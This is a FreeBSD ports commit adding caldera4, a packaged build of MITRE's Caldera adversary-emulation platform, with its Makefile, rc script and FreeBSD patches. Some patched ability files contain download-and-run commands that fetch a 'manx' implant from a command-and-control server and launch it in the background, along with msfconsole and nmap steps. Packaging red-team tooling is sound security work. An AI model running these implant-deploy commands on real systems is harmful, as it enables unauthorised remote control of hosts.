sync/ports
1
0
Fork 0
mirror of https://git.freebsd.org/ports.git synced 2025-07-18 09:49:18 -04:00
Code Issues Projects Releases Packages Wiki Activity Actions

security/caldera4: Repocopy from security/caldera

Browse source 
- Update pkg-message.in
- Update haproxy dependency to 2.4.x
- Fix permission issues with some caldera directories
- Bump PORTREVISION
This commit is contained in:
Jose Alonso Cardenas Marquez 2024-02-17 16:20:14 -05:00
parent 6dbc3df04e
commit 68d46afaba
No known key found for this signature in database
GPG key ID: 335B9246BA5E30F4
114 changed files with 3168 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

1
security/Makefile
View file

@ -67,6 +67,7 @@
SUBDIR += ca_root_nss SUBDIR += ca_root_nss
SUBDIR += caesarcipher SUBDIR += caesarcipher
SUBDIR += caldera SUBDIR += caldera
SUBDIR += caldera4
SUBDIR += caldera-ot SUBDIR += caldera-ot
SUBDIR += calife SUBDIR += calife
SUBDIR += cardpeek SUBDIR += cardpeek

105
security/caldera4/Makefile Normal file
View file

@ -0,0 +1,105 @@
PORTNAME= caldera
DISTVERSION= 4.2.0
PKGNAMESUFFIX= 4
PORTREVISION= 4
CATEGORIES= security python
MAINTAINER= acm@FreeBSD.org
COMMENT= Automated Adversary Emulation Platform
WWW= https://github.com/mitre/caldera
CONFLICTS= caldera
LICENSE= APACHE20
LICENSE_FILE= ${WRKSRC}/LICENSE
RUN_DEPENDS= ${PYTHON_PKGNAMEPREFIX}aiohttp>0:www/py-aiohttp@${PY_FLAVOR} \
${PYTHON_PKGNAMEPREFIX}aiohttp-jinja2>0:www/py-aiohttp-jinja2@${PY_FLAVOR} \
${PYTHON_PKGNAMEPREFIX}aiohttp-session>0:www/py-aiohttp-session@${PY_FLAVOR} \
${PYTHON_PKGNAMEPREFIX}aiohttp-security>0:security/py-aiohttp-security@${PY_FLAVOR} \
${PYTHON_PKGNAMEPREFIX}aiohttp-apispec>0:devel/py-aiohttp-apispec@${PY_FLAVOR} \
${PYTHON_PKGNAMEPREFIX}Jinja2>0:devel/py-Jinja2@${PY_FLAVOR} \
${PYTHON_PKGNAMEPREFIX}yaml>0:devel/py-yaml@${PY_FLAVOR} \
${PYTHON_PKGNAMEPREFIX}websockets>0:devel/py-websockets@${PY_FLAVOR} \
${PYTHON_PKGNAMEPREFIX}sphinx>0:textproc/py-sphinx@${PY_FLAVOR} \
${PYTHON_PKGNAMEPREFIX}docutils>0:textproc/py-docutils@${PY_FLAVOR} \
${PYTHON_PKGNAMEPREFIX}sphinx_rtd_theme>0:textproc/py-sphinx_rtd_theme@${PY_FLAVOR} \
${PYTHON_PKGNAMEPREFIX}myst-parser>0:textproc/py-myst-parser@${PY_FLAVOR} \
${PYTHON_PKGNAMEPREFIX}marshmallow>0:devel/py-marshmallow@${PY_FLAVOR} \
${PYTHON_PKGNAMEPREFIX}dirhash>0:security/py-dirhash@${PY_FLAVOR} \
${PYTHON_PKGNAMEPREFIX}docker>0:sysutils/py-docker@${PY_FLAVOR} \
${PYTHON_PKGNAMEPREFIX}donut-shellcode>0:devel/py-donut-shellcode@${PY_FLAVOR} \
${PYTHON_PKGNAMEPREFIX}marshmallow-enum>0:devel/py-marshmallow-enum@${PY_FLAVOR} \
${PYTHON_PKGNAMEPREFIX}ldap3>0:net/py-ldap3@${PY_FLAVOR} \
${PYTHON_PKGNAMEPREFIX}lxml>0:devel/py-lxml@${PY_FLAVOR} \
${PYTHON_PKGNAMEPREFIX}reportlab>0:print/py-reportlab@${PY_FLAVOR} \
${PYTHON_PKGNAMEPREFIX}svglib>0:converters/py-svglib@${PY_FLAVOR} \
${PYTHON_PKGNAMEPREFIX}markdown>0:textproc/py-markdown@${PY_FLAVOR} \
${PYTHON_PKGNAMEPREFIX}dnspython>0:dns/py-dnspython@${PY_FLAVOR} \
${PYTHON_PKGNAMEPREFIX}asyncssh>0:security/py-asyncssh@${PY_FLAVOR} \
${PYTHON_PKGNAMEPREFIX}aioftp>0:ftp/py-aioftp@${PY_FLAVOR} \
${PYTHON_PKGNAMEPREFIX}pyautogui>0:x11/py-pyautogui@${PY_FLAVOR} \
${PYTHON_PKGNAMEPREFIX}selenium>0:www/py-selenium@${PY_FLAVOR} \
${PYTHON_PKGNAMEPREFIX}webdriver_manager>0:www/py-webdriver_manager@${PY_FLAVOR} \
${PYTHON_PKGNAMEPREFIX}beautifulsoup>0:www/py-beautifulsoup@${PY_FLAVOR} \
${PYTHON_PKGNAMEPREFIX}networkx>0:math/py-networkx@${PY_FLAVOR} \
${PYTHON_PKGNAMEPREFIX}numpy>0:math/py-numpy@${PY_FLAVOR} \
upx>0:archivers/upx \
base64>0:converters/base64 \
git>0:devel/git \
bash>0:shells/bash
USE_GITHUB= yes
GH_ACCOUNT= mitre
GH_PROJECT= ${PORTNAME}
GH_TUPLE= mitre:access:0e67776:access/plugins/access \
mitre:atomic:9e2c958:atomic/plugins/atomic \
mitre:builder:f2ce67c:builder/plugins/builder \
mitre:compass:fb88e02:compass/plugins/compass \
mitre:debrief:e4d4f9e:debrief/plugins/debrief \
mitre:emu:02a0f3e:emu/plugins/emu \
mitre:fieldmanual:c286e77:fieldmanual/plugins/fieldmanual \
mitre:gameboard:3d98c32:gameboard/plugins/gameboard \
mitre:human:4368dea:human/plugins/human \
mitre:manx:e7205ea:manx/plugins/manx \
mitre:response:889213a:response/plugins/response \
mitre:sandcat:7c326bd:sandcat/plugins/sandcat \
mitre:ssl:ac5bfcb:ssl/plugins/ssl \
mitre:stockpile:960f9ad:stockpile/plugins/stockpile \
mitre:training:b058b67:training/plugins/training
USES= dos2unix go:run python
USE_PYTHON= cryptography
NO_ARCH= yes
NO_BUILD= yes
DOS2UNIX_REGEX= .*\.([yml])
CALDERA_USER= caldera
CALDERA_GROUP= caldera
USERS= ${CALDERA_USER}
GROUPS= ${CALDERA_GROUP}
USE_RC_SUBR= ${PORTNAME:S/-/_/}
SUB_FILES= pkg-message
SUB_LIST= PYTHON_CMD=${PYTHON_CMD} \
WWWDIR=${WWWDIR}
OPTIONS_DEFINE= HAPROXY
OPTIONS_DEFAULT=HAPROXY
HAPROXY_DESC= Support for HTTPS
HAPROXY_RUN_DEPENDS=haproxy24>0:net/haproxy24
post-extract:
${RM} -R ${WRKSRC}/.github
cd ${WRKSRC} && ${RM} .coveragerc .dockerignore .eslintrc.js .flake8 \
.git* .pre* .stylelintrc.json Dockerfile
post-patch:
cd ${WRKSRC} && \
${FIND} . -type f -name "*.orig" -exec ${RM} "{}" \;
do-install:
@cd ${WRKSRC} && ${COPYTREE_SHARE} . ${STAGEDIR}/${WWWDIR}
.include <bsd.port.mk>

33
security/caldera4/distinfo Normal file
View file

@ -0,0 +1,33 @@
TIMESTAMP = 1687320760
SHA256 (mitre-caldera-4.2.0_GH0.tar.gz) = 2c93501ca05fe89cd18a038376c278e50d371881dfe84824a0f98dc3d9023fd9
SIZE (mitre-caldera-4.2.0_GH0.tar.gz) = 3777586
SHA256 (mitre-access-0e67776_GH0.tar.gz) = dc80b9c5cb92f75fa6d18f618f64a4d3c5ddd1b08b020d86feb70fbaa0f4c43d
SIZE (mitre-access-0e67776_GH0.tar.gz) = 8494
SHA256 (mitre-atomic-9e2c958_GH0.tar.gz) = 0fbd0c3bb2c3c621afcb8f271b76df0f6ac2bacd72a7f8d9771c94b9a3f5d085
SIZE (mitre-atomic-9e2c958_GH0.tar.gz) = 15142
SHA256 (mitre-builder-f2ce67c_GH0.tar.gz) = da9d987a2a656bb9eb5d1c0d36115c8fb8fe740503fa1a43a1bfcce1018f461b
SIZE (mitre-builder-f2ce67c_GH0.tar.gz) = 7944
SHA256 (mitre-compass-fb88e02_GH0.tar.gz) = 6187446551f4041ac0a0c33689b4a62a39a02b285d988bd6f17647d89d98ce16
SIZE (mitre-compass-fb88e02_GH0.tar.gz) = 5907
SHA256 (mitre-debrief-e4d4f9e_GH0.tar.gz) = 721b262744118b91b812ec0e098fa0c75f845a7814d8fa58fa52a2ace04432ee
SIZE (mitre-debrief-e4d4f9e_GH0.tar.gz) = 998929
SHA256 (mitre-emu-02a0f3e_GH0.tar.gz) = 9dd6b46fe93ba12467612e4bf4a45df5513dad1709a72addc3898c430b8ec1ad
SIZE (mitre-emu-02a0f3e_GH0.tar.gz) = 17467
SHA256 (mitre-fieldmanual-c286e77_GH0.tar.gz) = 6f086d0d4f519d0dcf49fbded87ee8095622c3028461d745d2e7eea422d68d57
SIZE (mitre-fieldmanual-c286e77_GH0.tar.gz) = 7828491
SHA256 (mitre-gameboard-3d98c32_GH0.tar.gz) = 8415bbbc64fe78836afea2e364fe655cc364a5d70dcf3fbcb748617fc9b9ad0a
SIZE (mitre-gameboard-3d98c32_GH0.tar.gz) = 14753
SHA256 (mitre-human-4368dea_GH0.tar.gz) = 4710f3d6c7b3f728274187c36cda53232b3609d8177ccad6b1968ae99d83724a
SIZE (mitre-human-4368dea_GH0.tar.gz) = 22846
SHA256 (mitre-manx-e7205ea_GH0.tar.gz) = 5b39a00ff8bbe7b20d4cfcab6161edbbafd94fa9bd62af4741975f7759f7a470
SIZE (mitre-manx-e7205ea_GH0.tar.gz) = 7352820
SHA256 (mitre-response-889213a_GH0.tar.gz) = 4067efd0c4bddeed799255838a80316d96ba0c4cac84625d7d0257e44c00c4ee
SIZE (mitre-response-889213a_GH0.tar.gz) = 24463
SHA256 (mitre-sandcat-7c326bd_GH0.tar.gz) = 60049cf759e8b31b29e84832a112c87be8101e303d088e0f2b9da4647f79855f
SIZE (mitre-sandcat-7c326bd_GH0.tar.gz) = 7816391
SHA256 (mitre-ssl-ac5bfcb_GH0.tar.gz) = 01067db5fe9a32d07d13bbea4ffb6f3bd2907a57f2d50a7c7e9c5f2bdc823a12
SIZE (mitre-ssl-ac5bfcb_GH0.tar.gz) = 6395
SHA256 (mitre-stockpile-960f9ad_GH0.tar.gz) = 516d28ae26d66049e2273f60bbae0254b071152b613f259a7ff596ad2d92461f
SIZE (mitre-stockpile-960f9ad_GH0.tar.gz) = 4781396
SHA256 (mitre-training-b058b67_GH0.tar.gz) = 44c5ee5f682918f1f8ace4ff4ea3b8e16d24795ff8b8fb5896d68c585d33b8c0
SIZE (mitre-training-b058b67_GH0.tar.gz) = 491615

85
security/caldera4/files/caldera.in Normal file
View file

@ -0,0 +1,85 @@
#!/bin/sh
# PROVIDE: caldera
# REQUIRE: NETWORKING
# KEYWORD: shutdown
#
# Configuration settings for caldera in /etc/rc.conf:
#
# caldera_enable: run caldera as service (default=NO)
# caldera_flags: additional flags for caldera server
#
. /etc/rc.subr
name=caldera
rcvar=caldera_enable
load_rc_config ${name}
export PATH="${PATH}:/usr/local/bin:/usr/local/sbin"
: ${caldera_enable:=NO}
: ${caldera_flags="--insecure"}
caldera_env="GOCACHE=/tmp/caldera/.cache GOMODCACHE=/tmp/caldera/.vendor"
caldera_user="caldera"
caldera_wwwdir="%%WWWDIR%%"
caldera_logfile="/var/log/caldera.log"
pidfile="/var/run/${name}.pid"
python_command="%%PYTHON_CMD%%"
python_script="${caldera_wwwdir}/server.py"
start_cmd=${name}_start
status_cmd=${name}_status
stop_cmd=${name}_stop
restart_cmd=${name}_restart
extra_commands="status"
caldera_start()
{
if [ ! -f ${pidfile} ]
then
cd ${caldera_wwwdir} && \
daemon -u ${caldera_user} -p ${pidfile} -t ${name} -o ${caldera_logfile} \
${python_command} ${python_script} \
${caldera_flags}
echo "Starting ${name}"
else
echo "${name} is running as pid" `cat ${pidfile}`
fi
}
caldera_status()
{
# If running, show pid
if [ -f ${pidfile} ]
then
echo "${name} is running as pid" `cat ${pidfile}`
else
echo "${name} is not running"
fi
}
caldera_stop()
{
if [ -f ${pidfile} ]
then
kill `cat ${pidfile}`
rm ${pidfile}
echo "Stopping ${name}"
else
echo "${name} not running? (check ${pidfile})."
fi
}
caldera_restart()
{
echo "Performing restart ${name}"
caldera_stop
sleep 3
caldera_start
}
run_rc_command "$1"

11
security/caldera4/files/patch-plugins_access_data_abilities_build-capabilities_bed8f28e-c0ed-463e-9e31-d5607e5473df.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/access/data/abilities/build-capabilities/bed8f28e-c0ed-463e-9e31-d5607e5473df.yml.orig 2021-10-01 14:07:40 UTC
+++ plugins/access/data/abilities/build-capabilities/bed8f28e-c0ed-463e-9e31-d5607e5473df.yml
@@ -7,7 +7,7 @@
name: Build or acquire exploits
attack_id: T1349
platforms:
- darwin,linux:
+ darwin,freebsd,linux:
sh:
command: |
msfconsole -r msf_extract.rc #{app.contact.http} #{app.api_key.red}

11
security/caldera4/files/patch-plugins_access_data_abilities_technical-information-gathering_567eaaba-94cc-4a27-83f8-768e5638f4e1.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/access/data/abilities/technical-information-gathering/567eaaba-94cc-4a27-83f8-768e5638f4e1.yml.orig 2021-10-01 14:07:40 UTC
+++ plugins/access/data/abilities/technical-information-gathering/567eaaba-94cc-4a27-83f8-768e5638f4e1.yml
@@ -7,7 +7,7 @@
name: Conduct active scanning
attack_id: T1254
platforms:
- darwin,linux:
+ darwin,freebsd,linux:
sh:
command: |
./scanner.sh #{target.ip}

11
security/caldera4/files/patch-plugins_access_data_payloads_scanner.sh Normal file
View file

@ -0,0 +1,11 @@
--- plugins/access/data/payloads/scanner.sh.orig 2021-10-01 14:07:40 UTC
+++ plugins/access/data/payloads/scanner.sh
@@ -1,5 +1,5 @@
-#!/bin/bash
+#!/bin/sh
echo '[+] Starting basic NMAP scan'
nmap -Pn $1
-echo '[+] Complete with module'
\ No newline at end of file
+echo '[+] Complete with module'

20
security/caldera4/files/patch-plugins_atomic_app_atomic__svc.py Normal file
View file

@ -0,0 +1,20 @@
--- plugins/atomic/app/atomic_svc.py.orig 2022-08-11 15:59:49 UTC
+++ plugins/atomic/app/atomic_svc.py
@@ -13,7 +13,7 @@ from app.utility.base_world import BaseWorld
from app.utility.base_service import BaseService
from app.objects.c_agent import Agent
-PLATFORMS = dict(windows='windows', macos='darwin', linux='linux')
+PLATFORMS = dict(windows='windows', macos='darwin', linux='linux', freebsd='freebsd')
EXECUTORS = dict(command_prompt='cmd', sh='sh', powershell='psh', bash='sh')
RE_VARIABLE = re.compile('(#{(.*?)})', re.DOTALL)
PREFIX_HASH_LEN = 6
@@ -45,7 +45,7 @@ class AtomicService(BaseService):
the `repo_url` parameter (eg. if you want to use a fork).
"""
if not repo_url:
- repo_url = 'https://github.com/redcanaryco/atomic-red-team.git'
+ repo_url = 'https://github.com/alonsobsd/atomic-red-team.git'
if not os.path.exists(self.repo_dir) or not os.listdir(self.repo_dir):
self.log.debug('cloning repo %s' % repo_url)

11
security/caldera4/files/patch-plugins_emu_app_emu__svc.py Normal file
View file

@ -0,0 +1,11 @@
--- plugins/emu/app/emu_svc.py.orig 2022-06-12 20:12:01 UTC
+++ plugins/emu/app/emu_svc.py
@@ -12,7 +12,7 @@
class EmuService(BaseService):
- _dynamicically_compiled_payloads = {'sandcat.go-linux', 'sandcat.go-darwin', 'sandcat.go-windows'}
+ _dynamicically_compiled_payloads = {'sandcat.go-linux', 'sandcat.go-darwin', 'sandcat.go-windows', 'sandcat.go-freebsd'}
_emu_config_path = "conf/default.yml"
def __init__(self):

11
security/caldera4/files/patch-plugins_gameboard_app_gameboard__api.py Normal file
View file

@ -0,0 +1,11 @@
--- plugins/gameboard/app/gameboard_api.py.orig 2021-12-22 15:33:52 UTC
+++ plugins/gameboard/app/gameboard_api.py
@@ -244,7 +244,7 @@ class GameboardApi(BaseService):
reference_ability = (await self.data_svc.locate('abilities', match=dict(ability_id='bf565e6a-0037-4aa4-852f-1afa222c76db')))[0] #TODO: replace
ability_id = str(uuid.uuid4())
executors = []
- for pl in ['windows', 'darwin', 'linux']:
+ for pl in ['windows', 'darwin', 'linux', 'freebsd']:
reference_executor = reference_ability.find_executor('elasticsearch', pl)
if not reference_executor:
continue

40
security/caldera4/files/patch-plugins_human_templates_human.html Normal file
View file

@ -0,0 +1,40 @@
--- plugins/human/templates/human.html.orig 2022-09-06 17:33:12 UTC
+++ plugins/human/templates/human.html
@@ -60,6 +60,7 @@
<select id="base-platform">
<option disabled="disabled" selected="">Select target OS</option>
<option value="darwin">MacOS</option>
+ <option value="freebsd">FreeBSD</option>
<option value="linux">Linux</option>
<option value="windows-psh">Windows (PowerShell)</option>
</select>
@@ -257,6 +258,11 @@
' && virtualenv -p python3 \''+humanName+'\' && \''+humanName+'/bin/pip\' install -r \''+humanName+'/requirements.txt\' && \''+humanName+'/bin/python\' \''+humanName+'/human.py\' --clustersize '+taskCount+' ' +
'--taskinterval '+taskInterval+' --taskgroupinterval '+taskClusterInterval+' --extra '+extra;
break;
+ case "freebsd":
+ baseHuman = 'curl -sk -o \''+humanName+'.tar.gz\' -X POST -H \'file:'+humanName+'.tar.gz\' '+http+'/file/download 2>&1 && mkdir \''+humanName+'\' && tar -C \''+humanName+'\' -zxvf \''+humanName+'.tar.gz\' ' +
+ ' && virtualenv -p python3.9 \''+humanName+'\' && \''+humanName+'/bin/pip\' install -r \''+humanName+'/requirements.txt\' && \''+humanName+'/bin/python\' \''+humanName+'/human.py\' --clustersize '+taskCount+' ' +
+ '--taskinterval '+taskInterval+' --taskgroupinterval '+taskClusterInterval+' --extra '+extra;
+ break;
case "linux":
baseHuman = 'curl -sk -o \''+humanName+'.tar.gz\' -X POST -H \'file:'+humanName+'.tar.gz\' '+http+'/file/download 2>&1 && mkdir \''+humanName+'\' && tar -C \''+humanName+'\' -zxvf \''+humanName+'.tar.gz\' ' +
' && virtualenv -p python3 \''+humanName+'\' && \''+humanName+'/bin/pip\' install -r \''+humanName+'/requirements.txt\' && \''+humanName+'/bin/python\' \''+humanName+'/human.py\' --clustersize '+taskCount+' ' +
@@ -293,6 +299,10 @@
$.each(extra, function(i, command) {
switch (platform) {
case "darwin":
+ command = command.replace(/\\/g, '\\\\');
+ command = command.replace(/"/g, '\\\"');
+ break;
+ case "freebsd":
command = command.replace(/\\/g, '\\\\');
command = command.replace(/"/g, '\\\"');
break;
@@ -317,4 +327,4 @@
return provided_value || default_value;
}
-</script>
\ No newline at end of file
+</script>

33
security/caldera4/files/patch-plugins_manx_data_abilities_command-and-control_356d1722-7784-40c4-822b-0cf864b0b36d.yml Normal file
View file

@ -0,0 +1,33 @@
--- plugins/manx/data/abilities/command-and-control/356d1722-7784-40c4-822b-0cf864b0b36d.yml.orig 2022-08-08 23:34:48 UTC
+++ plugins/manx/data/abilities/command-and-control/356d1722-7784-40c4-822b-0cf864b0b36d.yml
@@ -57,6 +57,30 @@
contact="tcp";
agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:linux" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
nohup ./$agent -http $server -socket $socket -contact $contact &
+ freebsd:
+ sh:
+ command: |
+ server="#{app.contact.http}";
+ socket="#{app.contact.tcp}";
+ contact="tcp";
+ curl -s -X POST -H "file:manx.go" -H "platform:freebsd" $server/file/download > #{agents.implant_name};
+ chmod +x #{agents.implant_name};
+ ./#{agents.implant_name} -http $server -socket $socket -contact $contact -v
+ variations:
+ - description: Run against the UDP contact
+ command: |
+ server="#{app.contact.http}";
+ socket="#{app.contact.udp}";
+ contact="udp";
+ agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:freebsd" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
+ nohup ./$agent -http $server -socket $socket -contact $contact &
+ - description: Download with a random name and start as a background process
+ command: |
+ server="#{app.contact.http}";
+ socket="#{app.contact.tcp}";
+ contact="tcp";
+ agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:freebsd" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
+ nohup ./$agent -http $server -socket $socket -contact $contact &
windows:
psh:
command: |

12
security/caldera4/files/patch-plugins_manx_update-shells.sh Normal file
View file

@ -0,0 +1,12 @@
--- plugins/manx/update-shells.sh.orig 2022-08-08 23:34:48 UTC
+++ plugins/manx/update-shells.sh
@@ -1,7 +1,8 @@
-#!/bin/bash
+#!/bin/sh
cwd=$(pwd)
cd shells
GOOS=windows go build -o ../payloads/manx.go-windows -ldflags="-s -w" manx.go
GOOS=linux go build -o ../payloads/manx.go-linux -ldflags="-s -w" manx.go
GOOS=darwin go build -o ../payloads/manx.go-darwin -ldflags="-s -w" manx.go
+GOOS=freebsd go build -o ../payloads/manx.go-freebsd -ldflags="-s -w" manx.go
cd $cwd

15
security/caldera4/files/patch-plugins_response_data_abilities_command-and-control_1837b43e-4fff-46b2-a604-a602f7540469.yml Normal file
View file

@ -0,0 +1,15 @@
--- plugins/response/data/abilities/command-and-control/1837b43e-4fff-46b2-a604-a602f7540469.yml.orig 2021-10-13 20:41:40 UTC
+++ plugins/response/data/abilities/command-and-control/1837b43e-4fff-46b2-a604-a602f7540469.yml
@@ -24,3 +24,12 @@
python elasticat.py --server=$server --es-host="http://127.0.0.1:9200" --group=blue --minutes-since=60
cleanup: |
pkill -f elasticat
+ freebsd:
+ sh:
+ command: |
+ server="#{app.contact.http}";
+ curl -s -X POST -H "file:elasticat.py" -H "platform:freebsd" $server/file/download > elasticat.py;
+ pip install requests;
+ python elasticat.py --server=$server --es-host="http://127.0.0.1:9200" --group=blue --minutes-since=60
+ cleanup: |
+ pkill -f elasticat

11
security/caldera4/files/patch-plugins_response_data_abilities_detection_1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/response/data/abilities/detection/1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml.orig 2021-10-13 20:41:40 UTC
+++ plugins/response/data/abilities/detection/1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml
@@ -9,7 +9,7 @@
name: x
repeatable: True
platforms:
- linux:
+ freebsd,linux:
sh:
command: |
find /var/mail -type f -exec grep "From.*@.*\..*" {} \; | cut -d'@' -f2 | cut -d' ' -f1 | sort --uniq

18
security/caldera4/files/patch-plugins_response_data_abilities_detection_3b4640bc-eacb-407a-a997-105e39788781.yml Normal file
View file

@ -0,0 +1,18 @@
--- plugins/response/data/abilities/detection/3b4640bc-eacb-407a-a997-105e39788781.yml.orig 2021-10-13 20:41:40 UTC
+++ plugins/response/data/abilities/detection/3b4640bc-eacb-407a-a997-105e39788781.yml
@@ -17,7 +17,7 @@
- source: remote.port.unauthorized
edge: has_pid
target: host.pid.unauthorized
- linux:
+ freebsd,linux:
sh:
command: |
ps aux | grep -v grep | grep #{remote.port.unauthorized} | awk '{print $2}'
@@ -34,4 +34,4 @@
plugins.response.app.parsers.process:
- source: remote.port.unauthorized
edge: has_pid
- target: host.pid.unauthorized
\ No newline at end of file
+ target: host.pid.unauthorized

18
security/caldera4/files/patch-plugins_response_data_abilities_detection_930236c2-5397-4868-8c7b-72e294a5a376.yml Normal file
View file

@ -0,0 +1,18 @@
--- plugins/response/data/abilities/detection/930236c2-5397-4868-8c7b-72e294a5a376.yml.orig 2021-10-13 20:41:40 UTC
+++ plugins/response/data/abilities/detection/930236c2-5397-4868-8c7b-72e294a5a376.yml
@@ -7,7 +7,7 @@
name: x
repeatable: True
platforms:
- linux:
+ freebsd,linux:
sh:
command: |
filepath="#{file.sensitive.path}";
@@ -46,4 +46,4 @@
edge: has_hash
target: file.sensitive.hash
- plugins.stockpile.app.requirements.paw_provenance:
- - source: file.sensitive.hash
\ No newline at end of file
+ - source: file.sensitive.hash

18
security/caldera4/files/patch-plugins_response_data_abilities_detection_9bc10f37-0853-4d73-b547-019c11eda22f.yml Normal file
View file

@ -0,0 +1,18 @@
--- plugins/response/data/abilities/detection/9bc10f37-0853-4d73-b547-019c11eda22f.yml.orig 2021-10-13 20:41:40 UTC
+++ plugins/response/data/abilities/detection/9bc10f37-0853-4d73-b547-019c11eda22f.yml
@@ -7,7 +7,7 @@
name: x
repeatable: True
platforms:
- linux:
+ freebsd,linux:
sh:
command: |
directory="#{directory.sensitive.path}";
@@ -68,4 +68,4 @@
edge: has_hash
target: directory.sensitive.hash
- plugins.stockpile.app.requirements.paw_provenance:
- - source: directory.sensitive.hash
\ No newline at end of file
+ - source: directory.sensitive.hash

11
security/caldera4/files/patch-plugins_response_data_abilities_detection_ee54384f-cfbc-4228-9dc1-cc5632307afb.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/response/data/abilities/detection/ee54384f-cfbc-4228-9dc1-cc5632307afb.yml.orig 2021-10-13 20:41:40 UTC
+++ plugins/response/data/abilities/detection/ee54384f-cfbc-4228-9dc1-cc5632307afb.yml
@@ -8,7 +8,7 @@
name: x
repeatable: True
platforms:
- linux:
+ freebsd,linux:
sh:
command: |
set -f;

11
security/caldera4/files/patch-plugins_response_data_abilities_elastic__hunting_4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/response/data/abilities/elastic_hunting/4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml.orig 2021-10-13 20:41:40 UTC
+++ plugins/response/data/abilities/elastic_hunting/4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml
@@ -28,7 +28,7 @@
- source: host.process.guid
edge: has_interesting
target: investigate.process.guid
- linux:
+ freebsd,linux:
elasticsearch:
*cmd
darwin:

11
security/caldera4/files/patch-plugins_response_data_abilities_elastic__hunting_b419604e-6f82-40a4-b215-12f8c8156c2f.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/response/data/abilities/elastic_hunting/b419604e-6f82-40a4-b215-12f8c8156c2f.yml.orig 2021-10-13 20:41:40 UTC
+++ plugins/response/data/abilities/elastic_hunting/b419604e-6f82-40a4-b215-12f8c8156c2f.yml
@@ -25,7 +25,7 @@
- source: host.process.guid
edge: has_interesting
target: investigate.process.parent_guid
- linux:
+ freebsd,linux:
elasticsearch:
*cmd
darwin:

11
security/caldera4/files/patch-plugins_response_data_abilities_elastic__hunting_bf565e6a-0037-4aa4-852f-1afa222c76db.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/response/data/abilities/elastic_hunting/bf565e6a-0037-4aa4-852f-1afa222c76db.yml.orig 2021-10-13 20:41:40 UTC
+++ plugins/response/data/abilities/elastic_hunting/bf565e6a-0037-4aa4-852f-1afa222c76db.yml
@@ -22,7 +22,7 @@
- source: host.process.guid
edge: has_interesting
target: investigate.process.guid
- linux:
+ freebsd,linux:
elasticsearch:
*cmd
darwin:

18
security/caldera4/files/patch-plugins_response_data_abilities_response_02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml Normal file
View file

@ -0,0 +1,18 @@
--- plugins/response/data/abilities/response/02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml.orig 2021-10-13 20:41:40 UTC
+++ plugins/response/data/abilities/response/02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml
@@ -8,7 +8,7 @@
attack_id: x
name: x
platforms:
- linux:
+ freebsd,linux:
sh:
command: |
kill -9 #{host.pid.unauthorized}
@@ -25,4 +25,4 @@
taskkill /pid #{host.pid.unauthorized} /f
requirements:
- plugins.stockpile.app.requirements.paw_provenance:
- - source: host.pid.unauthorized
\ No newline at end of file
+ - source: host.pid.unauthorized

18
security/caldera4/files/patch-plugins_response_data_abilities_response_2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml Normal file
View file

@ -0,0 +1,18 @@
--- plugins/response/data/abilities/response/2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml.orig 2021-10-13 20:41:40 UTC
+++ plugins/response/data/abilities/response/2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml
@@ -7,7 +7,7 @@
attack_id: x
name: x
platforms:
- linux:
+ freebsd,linux:
sh:
command: |
if ! test -f hosts_backup; then cp /etc/hosts hosts_backup; fi;
@@ -27,4 +27,4 @@
if (-not (Test-Path -Path .\hosts_backup)) { Copy-Item -Path c:\windows\system32\drivers\etc\hosts -Destination .\hosts_backup; };
Add-Content c:\windows\system32\drivers\etc\hosts "127.0.0.1`t#{remote.suspicious.url}";
cleanup: |
- Move-Item -Path .\hosts_backup -Destination c:\windows\system32\drivers\etc\hosts -Force
\ No newline at end of file
+ Move-Item -Path .\hosts_backup -Destination c:\windows\system32\drivers\etc\hosts -Force

18
security/caldera4/files/patch-plugins_response_data_abilities_response_32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml Normal file
View file

@ -0,0 +1,18 @@
--- plugins/response/data/abilities/response/32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml.orig 2021-10-13 20:41:40 UTC
+++ plugins/response/data/abilities/response/32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml
@@ -7,7 +7,7 @@
attack_id: x
name: x
platforms:
- linux:
+ freebsd,linux:
sh:
command: |
crontab -u #{host.user.name} -l > temp_crontab;
@@ -35,4 +35,4 @@
edge: has_new_cronjob
target: host.new.cronjob
- plugins.stockpile.app.requirements.paw_provenance:
- - source: host.new.cronjob
\ No newline at end of file
+ - source: host.new.cronjob

18
security/caldera4/files/patch-plugins_response_data_abilities_response_bf01fdc9-d801-4461-81df-e511efb3c1fc.yml Normal file
View file

@ -0,0 +1,18 @@
--- plugins/response/data/abilities/response/bf01fdc9-d801-4461-81df-e511efb3c1fc.yml.orig 2021-10-13 20:41:40 UTC
+++ plugins/response/data/abilities/response/bf01fdc9-d801-4461-81df-e511efb3c1fc.yml
@@ -7,7 +7,7 @@
name: x
repeatable: False
platforms:
- linux:
+ freebsd,linux:
sh:
command: |
directory="#{directory.sensitive.path}";
